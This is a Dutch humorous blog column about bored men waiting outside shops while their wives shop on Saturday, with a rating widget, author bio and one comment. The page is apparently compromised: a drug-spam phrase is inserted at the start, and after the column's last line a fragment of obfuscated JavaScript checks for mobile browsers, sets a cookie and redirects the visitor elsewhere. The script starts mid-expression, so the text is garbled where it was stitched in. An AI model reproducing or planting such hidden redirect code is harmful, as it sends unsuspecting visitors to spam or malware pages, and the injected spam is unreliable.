De mannen van de winkelstraat

Seroquel pill price Het is zaterdagmiddag. Ze zijn de hele week van huis geweest om de kost te verdienen. Hard gewerkt, dat hebben de mannen van de winkelstraat naar eigen zeggen. Daar staan ze dan. Vermoeid. Verveeld. Verbouwereerd.

Wie kent ze niet? Op zaterdag stromen ze de binnenstad van iedere Nederlandse gemeente in. Ze zoeken naar een gratis parkeerplaats, om na een halfuur toch maar voor een tientje de plaatselijke parkeergarage in te rijden. Misschien mogen de mannen van de winkelstraat over een uurtje een pilsje bestellen, maar waarschijnlijk niet.

Eenmaal uit de auto slenteren ze achter hun vrouwen aan. Hun vrouwen gaan richting de winkelstraat. De mannen van de winkelstraat lopen langs volle terrassen en drukke ijssalons. Hun blikken richten zich onderdanig op de keien. Misschien mogen ze over een uurtje een pilsje bestellen, maar waarschijnlijk niet.

Ze stappen langzaam door naar die winkelstraat. Die winkelstraat die ze zo goed kennen, want ze zien hem ieder weekeinde; maar alleen van buiten. Ze zuchten, en kijken vermoeid op hun horloge of mobieltje. Ze vragen zich af wat hun vrouwen nu echt nodig hebben. Ze denken dat het dit keer niet zo lang zal duren. Als hun vrouwen snel klaar zijn mogen de mannen van de winkelstraat misschien over een uurtje een pilsje bestellen, maar waarschijnlijk niet.

Even later verdwijnen hun vrouwen in de plaatselijke H&M, V&D of C&A. De mannen van de winkelstraat staren naar de grijze gevel. Ze draaien 180 graden en parkeren zich tegen die grijze gevel. Verveeld kijken ze om zich heen. Op straat lopen vlotte studenten en kwieke jonge meiden. De mannen van de winkelstraat kijken nog maar eens op hun horloge. Misschien mogen ze over een uurtje een pilsje bestellen, maar waarschijnlijk niet.

Hun vrouwen lopen met een plastic tasje naar buiten. Even denken de mannen van de winkelstraat dat het voorbij is, hun vrouwen zijn immers geslaagd. Tien, misschien twintig meter duurt hun hoop op verlossing. Dan dient de volgende winkel zich aan. Braaf parkeren de mannen van de winkelstraat zich weer tegen de grijze gevel. Misschien mogen ze over een uurtje een pilsje bestellen, maar waarschijnlijk niet.

Morgenavond hebben ze afgesproken met hun schoonouders. Die komen steengrillen, en kijken naar de nieuwe badkamer. Gelukkig komen die schoonouders al om vijf uur. De mannen van de winkelstraat hopen morgenavond vroeg klaar te zijn. Misschien mogen ze dan Studio Sport kijken en een lekker pilsje drinken.

Maar waarschijnlijk niet. id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Zoon van Robert, kleinzoon van Laurens, kind van andere tijden, meester der luiheid, verleider der vunzigheid, brouwer des ongenoegens. En nog meer van die zotheden.

Een reactie op “De mannen van de winkelstraat”

  1. Ontglipt me daar nou toch net even een grinnik…

Laat een bericht achter